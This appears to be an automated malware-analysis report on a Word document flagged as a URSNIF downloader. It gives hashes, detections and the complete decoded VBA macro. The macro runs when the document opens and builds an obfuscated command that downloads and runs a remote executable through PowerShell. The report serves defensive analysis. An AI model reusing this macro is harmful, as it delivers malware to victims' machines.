Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bd9951ca0066007e…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 65.5 KB
Created: 2018-09-10 06:32:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: e13e3a54ff2d1b82f54c4446178ed3b3
SHA-1: 2c26728f03cad22010a7676191d45db4046ac35f
SHA-256: bd9951ca0066007e84a8fbcdd9ed75e59b27c50bee2ceae4e384a24775394028
Risk score: 152

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains a VBA macro triggered by the Document_Open event. The macro uses the Shell() function to execute a command, most likely to download and run a second-stage payload; the ClamAV detection 'Doc.Downloader.URSNIF' is consistent with this behavior. The command itself is obfuscated (it is assembled at run time from concatenated string fragments and Chr() arithmetic) but appears to be of the form 'cmd.exe /V /e set ...', consistent with downloader or dropper functionality.

Heuristics (6)

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected [medium; 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched lines in script:
       Second "sNGcDn" + "EqsfD" + "wpmkOnijjf" + "D"
    Shell FUbZDRlmmR + GOfGkmON, CStr(vbHide)
       Second "6842" + "urbRbhmPB"
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub Document_open()
    On _
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5188 bytes
SHA-256: a59d0d75e135fabbb508dd7a060f14ae4b077497d2b2337742c82df7100b535b
Detection:
ClamAV: No threats found
Obfuscation or payload: likely
56 of 85 identifiers look randomly generated (e.g. 'mqnnciuYVPSrZh'); 15 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "uHGWiAmqTDs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "GTC" + "pQD" + "238850110" + "v"
   Second "zQjJ" + "nGzt"
   Second "pF" + "485259260"
   Second "sNGcDn" + "EqsfD" + "wpmkOnijjf" + "D"
Shell FUbZDRlmmR + GOfGkmON, CStr(vbHide)
   Second "6842" + "urbRbhmPB"
   Second "muNsBirvrKCK" + "djN"
End Sub
Attribute VB_Name = "DYvUaSvfmBzH"
Function FUbZDRlmmR()

On _
Error _
Resume _
Next
Second "Qv" + "9078" + "266851503" + "279707765"
   Second "TBrriLF" + "423134774" + "7028" + "ofbNizija"
   Second "a" + "1321"
   Second "162630592" + "bOFQwwCTJv" + "MMoTiITn" + "nKYpSVpK"
   Second "466926327" + "151547686"
DYKYVNpVvWj = Format(Chr(1 + 12 + 15 + 11 + 60)) + "md" + " " + "/V/" + Format(Chr(0 + 8 + 10 + 7 + 42)) + Format(Chr(0 + 4 + 4 + 3 + 23)) + "s" + "^e^" + "t b"
Second "351704258" + "8834" + "o" + "432162443"
   Second "lOiHJlB" + "vbouISh"
   Second "oFaTOd" + "kYNTFjTwZJrs" + "AOnV" + "ZVBXtEQY"
   Second "zdGsI" + "332417580" + "199992884" + "7099"
   Second "49307178" + "XLVzpSC" + "6650" + "wKMzt"
QdwzkU = "^M= " + " ^  " + " " + " ^ " + "^ ^" + " ^ "
Second "242" + "199950827"
   Second "488" + "nXlXifM"
DKqGEihJtJX = " ^ ^  " + "^" + " " + " ^ }}" + "^{^h" + Format(Chr(1 + 12 + 15 + 11 + 60)) + "^t^" + "a" + Format(Chr(1 + 12 + 15 + 11 + 60)) + "^}^;" + "^k^aer" + "b;" + "t"
Second "4291" + "wb"
   Second "SaREs" + "HpMi"
bKlwjZFqtp = Format(Chr(0 + 8 + 10 + 7 + 42)) + "i$^ ^" + "metI-" + "^" + "e^ko"
Second "1078" + "pLIIpU" + "bd" + "QnvMOJ"
TDXGPr = "vnI^;" + ")" + "t" + Format(Chr(0 + 8 + 10 + 7 + 42)) + "^i^$^" + " ,^b^" + "X^D^" + "$" + "(el^i^F" + "d"
FUbZDRlmmR = DYKYVNpVvWj + QdwzkU + DKqGEihJtJX + bKlwjZFqtp + TDXGPr
   Second "245285517" + "azbiWM" + "hdzKGOfw" + "wjNJ"
End Function
Function GOfGkmON()

On _
Error _
Resume _
Next
Second "BHzp" + "648" + "ZolXs" + "l"
   Second "wfFj" + "zWjE" + "518689080" + "504861245"
   Second "pwBQwctjK" + "439753896"
   Second "329483111" + "bhO" + "223374708" + "lvMndd"
BnWpwY = "aol" + "n^wo" + "D." + "^j^b" + "^m^$"
Second "cGVwIjfcrPz" + "iuL"
   Second "314570321" + "4888"
   Second "SwSE" + "381617410" + "7738" + "WZzI"
NRAhiYOGVD = "^{" + "yrt{)G" + "^" + "dw$ ni" + " ^b" + "^X^D$(" + "^h" + Format(Chr(1 + 12 + 15 + 11 + 60)) + "aer" + "^of^;'" + "^e^x" + "^e.^'" + "+" + Format(Chr(1 + 12 + 15 + 11 + 60)) + "N^P$+" + "'^\'^" + "+" + Format(Chr(1 + 12 + 15 + 11 + 60)) + "^ilb"
Second "EniPLVnjSHK" + "YbUlfbiTP"
   Second "8805" + "202633571"
   Second "Djhz" + "512667952"
   Second "4949" + "1486"
iNifLzKrAs = "^u" + "p^:" + "vne^$=t" + Format(Chr(0 + 8 + 10 + 7 + 42)) + "^i$^" + ";'^59" + "^2'"
Second "Z" + "FSFifz"
   Second "ww" + "fuM" + "492398275" + "692"
WwNYhUF = "^ ^= " + Format(Chr(1 + 12 + 15 + 11 + 60)) + "N" + "P$^;)^" + "'^@" + "^'(ti^l" + "^p^S^." + "^'nk^t" + ".^9^gm" + "o=l^?^" + "ph" + "p" + "^.^"
Second "oSvoG" + "UYH" + "1949" + "218635637"
   Second "BpcqivBWsDY" + "ca"
   Second "nhN" + "dfiO"
iYBNzHUzzCO = "toksna^" + "p^o" + "/T" + "TR" + "/^mo" + Format(Chr(1 + 12 + 15 + 11 + 60)) + ".^" + "d^" + "s" + "a^yte^" + "e^g" + "h^y" + "^yu^u"
Second "WXDHmwlk" + "WztG"
   Second "CJVLOSJGjaD" + "KwET"
TMzbzM = "^dn^e/" + "/^:p^" + "t^th^" + "'^=Gd" + "w^$^;^t"
Second "ddlfEnQYWTj" + "pizGVzZqo" + "iB" + "p"
   Second "KqKVsicnF" + "SChc" + "8819" + "5381"
   Second "OlBiZN" + "530" + "Uhi" + "blPCzDLTz"
OCRszVm = "ne^il" + Format(Chr(0 + 8 + 10 + 7 + 42)) + "^beW^." + "^t^e" + "N" + "^ t" + Format(Chr(1 + 12 + 15 + 11 + 60)) + "^" + "ejb^o^" + "-wen=^j" + "bm$ l" + "l^ehs"
Second "ZU" + "zpWXBzUvkdPXwa" + "L" + "FP"
   Second "5878" + "JbowmfwC"
   Second "516709086" + "WIda"
   Second "Xzu" + "dD" + "Mf" + "1506"
QzGKjLkfvn = "re^w^o^" + "p&&^for" + " /^" + "L" + " %^u"
Second "hzb" + "ZTZ" + "j" + "143197305"
   Second "229679995" + "zwLvpfwjiXv"
   Second "vUAjl" + "Y" + "ncM" + "tGH"
   Second "70558587" + "UlAK" + "454893346" + "XnOhbPUX"
mDFVWij = " ^in (^" + "2^6^5" + ";-1;0" + ")" + "^do ^" + "s^et "
Second "6308" + "NSEdJFQkl"
   Second "ffJt" + "kTWHXrCmljYnK"
DmLiPX = "O^W^" + "3=!O" + "^W" + "^3" + "!!b^M:~" + "%^u,1!" + "&&i" + "^f %^u " + "l^" + "e"
Second "iWPLdBK" + "mqnnciuYVPSrZh"
   Second "iwzGAzr" + "NwnkI" + "203822623" + "992"
   Second "ZfMB" + "89227083" + "437667189" + "351597084"
   Second "131549004" + "2005"
KPtKMCOQPhc = "^q ^0 " + Format(Chr(1 + 12 + 15 + 11 + 60)) + "al" + "^" + "l %O^W" + "^" + "3" + ":^~^5" + "%" + Format(Chr(0 + 4 + 4 + 3 + 23)) + ""
GOfGkmON = BnWpwY + NRAhiYOGVD + iNifLzKrAs + WwNYhUF + iYBNzHUzzCO + TMzbzM + OCRszVm + QzGKjLkfvn + mDFVWij + DmLiPX + KPtKMCOQPhc
   Second "wNZfvKQp" + "hQpvfDSm" + "8384" + "325794529"
   Second "7575" + "u"
   Second "hBE" + "448593552" + "4843" + "3551"
   Second "2702" + "bklzWQJ"
   Second "Gql" + "f"
End Function